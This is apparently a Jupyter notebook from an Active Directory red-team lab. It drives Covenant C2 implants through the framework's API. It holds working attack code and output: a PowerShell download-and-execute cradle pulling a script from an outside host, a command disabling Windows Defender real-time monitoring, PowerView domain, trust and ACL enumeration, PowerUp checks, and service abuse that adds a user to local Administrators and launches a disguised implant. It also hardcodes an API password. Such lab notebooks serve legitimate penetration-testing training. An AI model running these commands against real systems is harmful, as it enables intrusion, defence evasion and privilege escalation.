### Setup for the Use of Covenant

In [10]:
import requests
import json
import time

# For pprint of json
from pprint import pprint

# Remove the InsecureRequestWarning from requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

covenantURL = "https://127.0.0.1:7443"
username="api"
password="qw34t5ry6RT45yrhfnghty675ythrgf654yrTT"

covenantLogin = covenantURL + "/api/users/login"
cHeaders = {"accept": "text/plain", "Content-Type":"application/json"}
cData = {"id": "string", "userName": username, "password": password}

resp = requests.post(covenantLogin, headers=cHeaders, data=json.dumps(cData), verify=False)
info = json.loads(resp.content) # Gather the content of the response
cToken = info['covenantToken']
#print(info['covenantToken']) # Pull the covenantToken

# Gather information for the grunts in the interface...
covenantGruntInfo = covenantURL + "/api/grunts"
cHeaders = {"Authorization": "Bearer " + cToken}
resp = requests.get(covenantGruntInfo, headers=cHeaders, verify=False)
info = json.loads(resp.content)
for i in info:
    gruntID = i['id']
    gruntName = i['name']
    activationTime = i['activationTime']
    lastCheckIn = i['lastCheckIn']
    info = "ID: " + str(gruntID)
    info += " Grunt Name: " + gruntName
    #info += " Activation Time: " + activationTime
    info += "\tLast Check In: " + lastCheckIn
    print(info)

ID: 1 Grunt Name: StudentVMTask1-4	Last Check In: 2021-06-29T23:25:08.1933834
ID: 2 Grunt Name: edcbbcdd72	Last Check In: 0001-01-01T00:00:00
ID: 3 Grunt Name: 3b19a9f0a0	Last Check In: 2021-07-01T23:42:26.7670553
ID: 4 Grunt Name: dbf9c65da5	Last Check In: 2021-07-02T00:15:33.6306112
ID: 5 Grunt Name: Jul5	Last Check In: 2021-07-05T16:14:23.8507704
ID: 6 Grunt Name: jul5-2	Last Check In: 2021-07-05T18:10:35.4128804
ID: 7 Grunt Name: jul5-3	Last Check In: 2021-07-05T18:10:37.2195559
ID: 8 Grunt Name: 94a6dc77e5	Last Check In: 0001-01-01T00:00:00
ID: 9 Grunt Name: LocalAdmin-Jul5-4	Last Check In: 2021-07-05T18:51:14.8465656
ID: 10 Grunt Name: 9602485069	Last Check In: 2021-07-05T18:29:01.1611831
ID: 11 Grunt Name: 0bdcd41e04	Last Check In: 2021-07-05T18:51:14.7231979
ID: 12 Grunt Name: 960ed5dacb	Last Check In: 2021-07-06T22:21:31.3349727
ID: 13 Grunt Name: 3a39352761	Last Check In: 2021-07-06T22:23:17.6350404


#### Use a Grunt to Create a New Connection

In [84]:
executePS("(iex (New-Object Net.WebClient).DownloadString('http://192.168.99.10/remoteupdatepatch.ps1'))")

-- Command Sent --
Grunt Task ID:90
Powershell (iex (New-Object Net.WebClient).DownloadString('http://192.168.99.10/remoteupdatepatch.ps1'))



Task has not completed...cedf5d2d80 tasked
taskParam


### Select the Grunt for Interaction

In [11]:
activeGruntID="13"

# Select the Grunt ID from above that you want to interact with...
def executePS(c):
    #global activeGruntID
    covenantInteract = covenantURL + "/api/grunts/" + activeGruntID + "/interact"
    command = "Powershell " + c
    cHeaders = {"Authorization": "Bearer " + cToken, "accept": "application/json", "Content-Type":"application/json"}
    cData = command
    resp = requests.post(covenantInteract, headers=cHeaders, data=json.dumps(cData), verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content) # Gather the content of the response
    taskID = info['id']
    taskCommand = info['command']
    gruntTaskID = info['gruntTaskingId']
    print("-- Command Sent --\nGrunt Task ID:" + str(gruntTaskID) + "\n" + taskCommand)
    # Wait 20 seconds and then try and gather the task output
    print("\n\n")
    time.sleep(20)
    gatherTask(gruntTaskID)
    
# Execute a Command Line Command
def executeCMD(c):
    #global activeGruntID
    covenantInteract = covenantURL + "/api/grunts/" + activeGruntID + "/interact"
    command = "shellcmd " + c
    cHeaders = {"Authorization": "Bearer " + cToken, "accept": "application/json", "Content-Type":"application/json"}
    cData = command
    resp = requests.post(covenantInteract, headers=cHeaders, data=json.dumps(cData), verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content) # Gather the content of the response
    taskID = info['id']
    taskCommand = info['command']
    gruntTaskID = info['gruntTaskingId']
    print("-- Command Sent --\nGrunt Task ID:" + str(gruntTaskID) + "\n" + taskCommand)
    # Wait 20 seconds and then try and gather the task output
    print("\n\n")
    time.sleep(20)
    gatherTask(gruntTaskID)
    
# Execute a command through PSRemoting by specifying the machine and command
def executePSRemote(m, c):
    #global activeGruntID
    covenantInteract = covenantURL + "/api/grunts/" + activeGruntID + "/interact"
    command = "PowerShellRemotingCommand " + m + " \"" + c + "\""
    cHeaders = {"Authorization": "Bearer " + cToken, "accept": "application/json", "Content-Type":"application/json"}
    cData = command
    resp = requests.post(covenantInteract, headers=cHeaders, data=json.dumps(cData), verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content) # Gather the content of the response
    taskID = info['id']
    taskCommand = info['command']
    gruntTaskID = info['gruntTaskingId']
    print("-- Command Sent --\nGrunt Task ID:" + str(gruntTaskID) + "\n" + taskCommand)
    # Wait 20 seconds and then try and gather the task output
    print("\n\n")
    time.sleep(20)
    gatherTask(gruntTaskID)
    
#gruntTaskID --> results are stored as a --> gruntCommandID for the output
    
def gatherTask(tID):
    # Can be used to see if the command completed...
    covenantGruntTask = covenantURL + "/api/taskings/" + str(tID)
    #covenantGruntTask = covenantURL + "/api/grunts/" + str(activeGruntID) + "/taskings"
    cHeaders = {"Authorization": "Bearer " + cToken}
    resp = requests.get(covenantGruntTask, headers=cHeaders, verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content)
    taskName = info['name']
    taskParam = info['parameters']
    taskStatus = info['status']
    gruntCommandID = info['gruntCommandId']
    #print(taskStatus)
    if taskStatus == "completed":
        # Same as above just referenced based on the name
        #covenantGruntInfo = covenantURL + "/api/grunts/taskings/1f33b2070f"
        # Task ID is taken from the above... If the command has completed...
        covenantGruntInfo = covenantURL + "/api/commandoutputs/" + str(gruntCommandID)
        cHeaders = {"Authorization": "Bearer " + cToken}
        resp = requests.get(covenantGruntInfo, headers=cHeaders, verify=False)
        info = json.loads(resp.content)
        print(info['output'])
    else:
        print("Task has not completed..." + taskName + " " + taskStatus + "\ntaskParam")

### Powershell Imports
Conduct these import through the Covenant WebGUI

PowerView.ps1
PowerUp.ps1

### Identify Windows Defender Settings

Evaluate the exculsions for extensions and paths that are put in-place
You need to be an admin to view them...

In [76]:
executePS("Get-MpPreference")

-- Command Sent --
Grunt Task ID:86
Powershell Get-MpPreference





AllowNetworkProtectionOnWinServer             : False
AttackSurfaceReductionOnlyExclusions          : 
AttackSurfaceReductionRules_Actions           : 
AttackSurfaceReductionRules_Ids               : 
CheckForSignaturesBeforeRunningScan           : False
CloudBlockLevel                               : 0
CloudExtendedTimeout                          : 0
ComputerID                                    : 1D9EA598-7A1B-4CF0-8C04-F620158883FE
ControlledFolderAccessAllowedApplications     : 
ControlledFolderAccessProtectedFolders        : 
DisableArchiveScanning                        : False
DisableAutoExclusions                         : False
DisableBehaviorMonitoring                     : False
DisableBlockAtFirstSeen                       : False
DisableCatchupFullScan                        : True
DisableCatchupQuickScan                       : True
DisableCpuThrottleOnIdleScans                 : True
DisableDatagramPro

In [78]:
# Disable a given option set for Windows Defender
# Need admin privileges
executePS("(Set-MpPreference -DisableRealtimeMonitoring $true)")

-- Command Sent --
Grunt Task ID:87
Powershell (Set-MpPreference -DisableRealtimeMonitoring $true)



Task has not completed...343d367d81 tasked
taskParam


In [80]:
gatherTask(87)

Task has not completed...343d367d81 tasked
taskParam


### Testing the Functions

In [11]:
# Pass a powershell command to the function for the results
executePS("Get-Service")

-- Command Sent --
TaskID:32
Powershell Get-Service


In [6]:
# The task number returned input to pull the output
gatherTask(32)


Status   Name               DisplayName                           
------   ----               -----------                           
Stopped  AJRouter           AllJoyn Router Service                
Running  ALG                Application Layer Gateway Service     
Stopped  AppIDSvc           Application Identity                  
Stopped  Appinfo            Application Information               
Stopped  AppMgmt            Application Management                
Stopped  AppReadiness       App Readiness                         
Stopped  AppVClient         Microsoft App-V Client                
Stopped  AppXSvc            AppX Deployment Service (AppXSVC)     
Stopped  AudioEndpointBu... Windows Audio Endpoint Builder        
Stopped  Audiosrv           Windows Audio                         
Stopped  AxInstSV           ActiveX Installer (AxInstSV)          
Running  BFE                Base Filtering Engine                 
Stopped  BITS               Background Intelligent Transfer S

### Grunt Tasks

### Domain Enumeration with PowerView

In [61]:
# Import powerview.ps1 using the GUI

# Get Current Domain
executePS("Get-Domain")

-- Command Sent --
Grunt Task ID:52
Powershell Get-Domain


In [67]:
# Gather Results
gatherTask(52)

# Build a function to save the results for future parsing

completed


logoncount                    : 151
badpasswordtime               : 1/6/2021 2:30:40 AM
description                   : Built-in account for administering the computer/domain
distinguishedname             : CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local
objectclass                   : {top, person, organizationalPerson, user}
lastlogontimestamp            : 1/1/2021 1:58:38 AM
name                          : Administrator
objectsid                     : S-1-5-21-210670787-2521448726-163245708-500
samaccountname                : Administrator
logonhours                    : {255, 255, 255, 255...}
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : 12/31/1600 4:00:00 PM
countrycode                   : 0
whenchanged                   : 1/1/2021 9:58:38 AM
instancetype                  : 4
objectguid                    : 6065fe62-0dcb-4a5e-bcad-e99f2dec4cdd
lastlogon              

### Domain User Enumeration

In [60]:
executePS("Get-DomainUser")

-- Command Sent --
Grunt Task ID:51
Powershell Get-DomainUser


In [64]:
gatherTask(51)

completed
Administrator
Guest
krbtgt
emptest
adconnect
mgmtadmin
helpdeskadmin
dbservice
atauser
exchangeadmin
HealthMailbox3bd1057
HealthMailboxc8de558
HealthMailbox01f72be
HealthMailbox128342c
HealthMailboxbb3d25e
HealthMailbox87cf12f
HealthMailboxd517735
HealthMailbox86956b9
HealthMailbox307c425
HealthMailbox7f97592
HealthMailboxd933b3c
exchangemanager
exchangeuser
pawadmin
jwilliams
webmaster
serviceaccount
studentuser35
studentuser36
studentuser37
studentuser38
studentuser39
studentuser40
studentuser41
studentuser42
studentuser43
studentuser44
studentuser45
devuser
testda
decda
studentuser46
Support35user
Support36user
Support37user
Support38user
Support39user
Support40user
Support41user
Support42user
Support43user
Support44user
Support45user
Support46user
appsvc



In [55]:
# Gather a list of samaccount names
executePS("(Get-DomainUser | Select -ExpandProperty samaccountname)")

-- Command Sent --
Grunt Task ID:50
Powershell (Get-DomainUser | Select -ExpandProperty samaccountname)


In [58]:
gatherTask(50)

completed
Administrator
Guest
krbtgt
emptest
adconnect
mgmtadmin
helpdeskadmin
dbservice
atauser
exchangeadmin
HealthMailbox3bd1057
HealthMailboxc8de558
HealthMailbox01f72be
HealthMailbox128342c
HealthMailboxbb3d25e
HealthMailbox87cf12f
HealthMailboxd517735
HealthMailbox86956b9
HealthMailbox307c425
HealthMailbox7f97592
HealthMailboxd933b3c
exchangemanager
exchangeuser
pawadmin
jwilliams
webmaster
serviceaccount
studentuser35
studentuser36
studentuser37
studentuser38
studentuser39
studentuser40
studentuser41
studentuser42
studentuser43
studentuser44
studentuser45
devuser
testda
decda
studentuser46
Support35user
Support36user
Support37user
Support38user
Support39user
Support40user
Support41user
Support42user
Support43user
Support44user
Support45user
Support46user
appsvc



### Domain Computer Enumeration

In [68]:
executePS("(Get-DomainComputer | Select -ExpandProperty Name)")

-- Command Sent --
Grunt Task ID:53
Powershell (Get-DomainComputer | Select -ExpandProperty Name)


In [80]:
gatherTask(53)

US-DC
US-EXCHANGE
US-MGMT
US-HELPDESK
US-MSSQL
US-MAILMGMT
US-JUMP
US-WEB
US-ADCONNECT
STUDENT35
STUDENT36
STUDENT37
STUDENT38
STUDENT39
STUDENT40
STUDENT41
STUDENT42
STUDENT43
STUDENT44
STUDENT45
STUDENT46



### Enumerating Domain Admins Group

In [3]:
executePS("(Get-DomainGroup -Identity 'Domain Admins')")

-- Command Sent --
Grunt Task ID:55
Powershell (Get-DomainGroup -IDentity 'Domain Admins')


In [6]:
gatherTask(55)



grouptype              : GLOBAL_SCOPE, SECURITY
admincount             : 1
iscriticalsystemobject : True
samaccounttype         : GROUP_OBJECT
samaccountname         : Domain Admins
whenchanged            : 7/19/2019 7:16:32 PM
objectsid              : S-1-5-21-210670787-2521448726-163245708-512
objectclass            : {top, group}
cn                     : Domain Admins
usnchanged             : 282184
dscorepropagationdata  : {7/30/2019 12:35:19 PM, 7/10/2019 4:53:40 PM, 7/10/2019 4:00:03 PM, 7/7/2019 4:11:13 AM...}
memberof               : {CN=Denied RODC Password Replication Group,CN=Users,DC=us,DC=techcorp,DC=local, 
                         CN=Administrators,CN=Builtin,DC=us,DC=techcorp,DC=local}
description            : Designated administrators of the domain
distinguishedname      : CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local
name                   : Domain Admins
member                 : {CN=decda,CN=Users,DC=us,DC=techcorp,DC=local, 
                         CN=Admi

In [5]:
executePS("(Get-DomainGroupMember -Identity 'Domain Admins')")

-- Command Sent --
Grunt Task ID:56
Powershell (Get-DomainGroupMember -Identity 'Domain Admins')


In [7]:
gatherTask(56)



GroupDomain             : us.techcorp.local
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local
MemberDomain            : us.techcorp.local
MemberName              : decda
MemberDistinguishedName : CN=decda,CN=Users,DC=us,DC=techcorp,DC=local
MemberObjectClass       : user
MemberSID               : S-1-5-21-210670787-2521448726-163245708-1289

GroupDomain             : us.techcorp.local
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local
MemberDomain            : us.techcorp.local
MemberName              : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local
MemberObjectClass       : user
MemberSID               : S-1-5-21-210670787-2521448726-163245708-500






In [17]:
# Note the Enterprise Admins group only exists at the Forest Level
executePS("(Get-DomainGroupMember -Identity 'Enterprise Admins' -Domain techcorp.local)")

-- Command Sent --
Grunt Task ID:60
Powershell (Get-DomainGroupMember -Identity 'Enterprise Admins' -Domain techcorp.local)


In [19]:
gatherTask(60)



GroupDomain             : techcorp.local
GroupName               : Enterprise Admins
GroupDistinguishedName  : CN=Enterprise Admins,CN=Users,DC=techcorp,DC=local
MemberDomain            : techcorp.local
MemberName              : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=techcorp,DC=local
MemberObjectClass       : user
MemberSID               : S-1-5-21-2781415573-3701854478-2406986946-500






### Enumerate Domain Kerberos Policy

In [10]:
executePS("(Get-DomainPolicy | Select -ExpandProperty KerberosPolicy)")

-- Command Sent --
Grunt Task ID:58
Powershell (Get-DomainPolicy | Select -ExpandProperty KerberosPolicy)


In [15]:
gatherTask(58)



MaxTicketAge         : 10
MaxRenewAge          : 7
MaxServiceAge        : 600
MaxClockSkew         : 5
TicketValidateClient : 1






### Enumerate Group Policies

In [20]:
executePS("Get-DomainGPOLocalGroup")

-- Command Sent --
Grunt Task ID:61
Powershell Get-DomainGPOLocalGroup


In [22]:
gatherTask(61)



GPODisplayName : Mgmt
GPOName        : {B78BFC6B-76DB-4AA4-9CF6-26260697A8F9}
GPOPath        : \\us.techcorp.local\SysVol\us.techcorp.local\Policies\{B78BFC6B-76DB-4AA4-9CF6-26260697A8F9}
GPOType        : RestrictedGroups
Filters        : 
GroupName      : US\machineadmins
GroupSID       : S-1-5-21-210670787-2521448726-163245708-1118
GroupMemberOf  : {S-1-5-32-544}
GroupMembers   : {}






#### Evaluate the Group Membership of machineadmins

In [26]:
executePS("(Get-DomainGroupMember -Identity machineadmins)")

-- Command Sent --
Grunt Task ID:63
Powershell (Get-DomainGroupMember -Identity machineadmins)


In [28]:
gatherTask(63)
# No machineadmins are present at this time...

### List Domain OU's

In [29]:
executePS("(Get-DomainOU)")

-- Command Sent --
Grunt Task ID:67
Powershell (Get-DomainOU)


In [30]:
gatherTask(67)



usncreated             : 7925
systemflags            : -1946157056
iscriticalsystemobject : True
gplink                 : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=us,DC=techcorp,DC=lo
                         cal;0]
whenchanged            : 7/5/2019 7:48:21 AM
objectclass            : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged             : 7925
dscorepropagationdata  : {7/30/2019 12:40:16 PM, 7/30/2019 12:39:53 PM, 7/30/2019 12:39:00 PM, 7/30/2019 12:35:19 PM...}
name                   : Domain Controllers
description            : Default container for domain controllers
distinguishedname      : OU=Domain Controllers,DC=us,DC=techcorp,DC=local
ou                     : Domain Controllers
whencreated            : 7/5/2019 7:48:21 AM
instancetype           : 4
objectguid             : fc0dd146-a66e-45cc-83ae-9e5a0c39ed91
objectcategory         : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=techcorp,DC=local

usncreated 

In [31]:
# The above Task but only lists the OUs
executePS("(Get-DomainOU | Select -ExpandProperty ou)")

-- Command Sent --
Grunt Task ID:68
Powershell (Get-DomainOU | Select -ExpandProperty ou)


In [33]:
gatherTask(68)

Domain Controllers
Mgmt
MailMgmt
PAW
Students



### Gather information about Students OU

In [34]:
executePS("((Get-DomainOU -Identity Students).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name)")

-- Command Sent --
Grunt Task ID:69
Powershell ((Get-DomainOU -Identity Students).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name)


In [36]:
gatherTask(69)


name     
----     
STUDENT35
STUDENT36
STUDENT37
STUDENT38
STUDENT39
STUDENT40
STUDENT41
STUDENT42
STUDENT43
STUDENT44
STUDENT45
STUDENT46





### Gather Domain GPOs

In [38]:
executePS("Get-DomainGPO")

-- Command Sent --
Grunt Task ID:70
Powershell Get-DomainGPO


In [39]:
gatherTask(70)



usncreated               : 7793
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}{D02B1F72-3407-4
                           8AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C9
                           0F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged              : 7/20/2019 11:35:15 AM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 329583
dscorepropagationdata    : {7/30/2019 12:35:19 PM, 7/10/2019 4:00:03 PM, 7/10/2019 4:00:03 PM, 7/7/2019 4:11:13 AM...}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True


In [40]:
# Gather the displayname of the GPO's
executePS("Get-DomainGPO | Select -ExpandProperty displayname")

-- Command Sent --
Grunt Task ID:71
Powershell Get-DomainGPO | Select -ExpandProperty displayname


In [42]:
gatherTask(71)

Default Domain Policy
Default Domain Controllers Policy
MailMgmt
PAW
Mgmt
StudentPolicies



In [43]:
# Then use the name property for the details of a GPO
executePS("(Get-DomainGPO -Identity '{31B2F340-016D-11D2-945F-00C04FB984F9}')")

-- Command Sent --
Grunt Task ID:72
Powershell (Get-DomainGPO -Identity '{31B2F340-016D-11D2-945F-00C04FB984F9}')


In [45]:
gatherTask(72)



usncreated               : 7793
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}{D02B1F72-3407-4
                           8AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C9
                           0F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged              : 7/20/2019 11:35:15 AM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 329583
dscorepropagationdata    : {7/30/2019 12:35:19 PM, 7/10/2019 4:00:03 PM, 7/10/2019 4:00:03 PM, 7/7/2019 4:11:13 AM...}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True


In [46]:
# You can also query the OU and the Group Policies Linked to the OU
executePS("((Get-DomainOU -Identity Students).gplink)")

-- Command Sent --
Grunt Task ID:73
Powershell ((Get-DomainOU -Identity Students).gplink)


In [47]:
gatherTask(73)

[LDAP://cn={FCE16496-C744-4E46-AC89-2D01D76EAD68},cn=policies,cn=system,DC=us,DC=techcorp,DC=local;0]



In [55]:
# Using the GPLink provided for the Students OU we can inspect it
executePS("(Get-DomainGPO -Identity '{FCE16496-C744-4E46-AC89-2D01D76EAD68}')")

-- Command Sent --
Grunt Task ID:76
Powershell (Get-DomainGPO -Identity '{FCE16496-C744-4E46-AC89-2D01D76EAD68}')


usncreated               : 330304
displayname              : StudentPolicies
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC
                           -11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 7/20/2019 2:17:57 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 338463
dscorepropagationdata    : {7/30/2019 12:35:19 PM, 1/1/1601 12:00:00 AM}
name                     : {FCE16496-C744-4E46-AC89-2D01D76EAD68}
flags                    : 0
cn                       : {FCE16496-C744-4E46-AC89-2D01D76EAD68}
gpcfilesyspath           : \\us.techcorp.local\SysVol\us.techcorp.local\Policies\{FCE16496-C744-4E46-AC89-2D01D76EAD68}
distinguishedname        : CN={F

### Enumerate ACL for the Domain Admins Group

In [57]:
executePS("(Get-DomainObjectACL -Identity 'Domain Admins' -ResolveGUIDs -Verbose)")

-- Command Sent --
Grunt Task ID:78
Powershell (Get-DomainObjectACL -Identity 'Domain Admins' -ResolveGUIDs -Verbose)
[Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL
[Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/DC=techcorp,DC=local
[Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=krbtgt)))
[Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/CN=Schema,CN=Configuration,DC=techcorp,DC=local
[Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/CN=Extended-Rights,CN=Configuration,DC=techcorp,DC=local
[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))


AceQualifier           : AccessAllowed
ObjectDN               : CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local
ActiveDirectoryRights  : CreateChild, DeleteChild, ListChildren
ObjectAceType          : ms-Exch-Active-Sync-Devices
O

### Enumerate and Find Interesting ACLs

In [69]:
# Trying with my studentuser39
executePS("(Find-InterestingDomainACL -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'StudentUser39'})")

-- Command Sent --
Grunt Task ID:82
Powershell (Find-InterestingDomainACL -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'StudentUser39'})



Task has not completed...0a0c70e986 tasked
taskParam


In [71]:
gatherTask(82)

[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName



In [72]:
# Trying with the StudentUsers group
executePS("(Find-InterestingDomainACL -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'StudentUsers'})")

-- Command Sent --
Grunt Task ID:83
Powershell (Find-InterestingDomainACL -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'StudentUsers'})



Task has not completed...c386f1e284 uninitialized
taskParam


In [74]:
gatherTask(83)

Task has not completed...c386f1e284 uninitialized
taskParam


### Enumerate the Forest and Domains

In [81]:
executePS("((Get-ForestDomain).Name)")

-- Command Sent --
Grunt Task ID:88
Powershell ((Get-ForestDomain).Name)



techcorp.local
us.techcorp.local



### Gather Domain Trusts

In [88]:
executePS("(Get-DomainTrust)")

-- Command Sent --
Grunt Task ID:92
Powershell (Get-DomainTrust)





SourceName      : us.techcorp.local
TargetName      : techcorp.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 7/5/2019 7:48:23 AM
WhenChanged     : 7/5/2021 1:04:14 PM

SourceName      : us.techcorp.local
TargetName      : eu.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection  : Bidirectional
WhenCreated     : 7/13/2019 11:17:35 AM
WhenChanged     : 7/5/2021 1:16:41 PM






### Gather Forest Trust Information

In [89]:
executePS("(Get-ForestTrust)")

-- Command Sent --
Grunt Task ID:93
Powershell (Get-ForestTrust)





TopLevelNames            : {usvendor.local}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {usvendor.local}
SourceName               : techcorp.local
TargetName               : usvendor.local
TrustType                : Forest
TrustDirection           : Bidirectional

TopLevelNames            : {bastion.local}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {bastion.local}
SourceName               : techcorp.local
TargetName               : bastion.local
TrustType                : Forest
TrustDirection           : Inbound






In [90]:
# Identify the external trusts
executePS("(Get-DomainTrust -Net | ?{$_.TrustType -eq 'External'})")

-- Command Sent --
Grunt Task ID:94
Powershell (Get-DomainTrust -Net | ?{$_.TrustType -eq 'External'})




SourceName        TargetName TrustType TrustDirection
----------        ---------- --------- --------------
us.techcorp.local eu.local    External  Bidirectional





In [91]:
## Query Specific Forests for Trusts
executePS("(Get-ForestTrust -Forest eu.local)")

-- Command Sent --
Grunt Task ID:95
Powershell (Get-ForestTrust -Forest eu.local)





TopLevelNames            : {euvendor.local}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {euvendor.local}
SourceName               : eu.local
TargetName               : euvendor.local
TrustType                : Forest
TrustDirection           : Bidirectional






### Use PowerUp to Identify Privilege Escalation

In [92]:
executePS("Invoke-AllChecks")

-- Command Sent --
Grunt Task ID:97
Powershell Invoke-AllChecks



Task has not completed...7e81f97616 uninitialized
taskParam


In [93]:
gatherTask(98)


[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdate'
CanRestart                      : False

ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction       

### ALG Service is Vulnerable Using it to Add studentuser39 to Local Administrators Group

In [94]:
executePS("(Invoke-ServiceAbuse -Name ALG -UserName us\studentuser39 -Verbose)")

-- Command Sent --
Grunt Task ID:99
Powershell (Invoke-ServiceAbuse -Name ALG -UserName us\studentuser39 -Verbose)



Service 'ALG' original path: 'C:\Windows\System32\alg.exe'
Service 'ALG' original state: 'Running'
Executing command 'net localgroup Administrators us\studentuser39 /add'
binPath for ALG successfully set to 'net localgroup Administrators us\studentuser39 /add'
Restoring original path to service 'ALG'
binPath for ALG successfully set to 'C:\Windows\System32\alg.exe'
Restarting 'ALG'

ServiceAbused Command                                            
------------- -------                                            
ALG           net localgroup Administrators us\studentuser39 /add





In [97]:
# Lets check the local admins group
executeCMD("net localgroup administrators")

-- Command Sent --
Grunt Task ID:101
shellcmd net localgroup administrators



Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
US\Domain Admins
US\emptest
US\studentuser39
The command completed successfully.






### Abuse the Service to Get a Grunt running with Local Admin

In [99]:
# PowershellImport Powerview with the new Grunt
executePS("(Invoke-ServiceAbuse -Name ALG -Command 'cmd.exe /c c:\AD\RemoteDesktopUpdate.exe')")

-- Command Sent --
Grunt Task ID:103
Powershell (Invoke-ServiceAbuse -Name ALG -Command 'cmd.exe /c c:\AD\RemoteDesktopUpdate.exe')



Task has not completed...2dfd30fc34 tasked
taskParam


### Identify Machines in the Domain where studentuser39 has local administrative access due to group membership

In [103]:
# Find the groups that studentuser39 belongs
executePS("(Get-DomainGroup -MemberIdentity studentuser39 | Select -ExpandProperty distinguishedname)")

-- Command Sent --
Grunt Task ID:106
Powershell (Get-DomainGroup -MemberIdentity studentuser39 | Select -ExpandProperty distinguishedname)



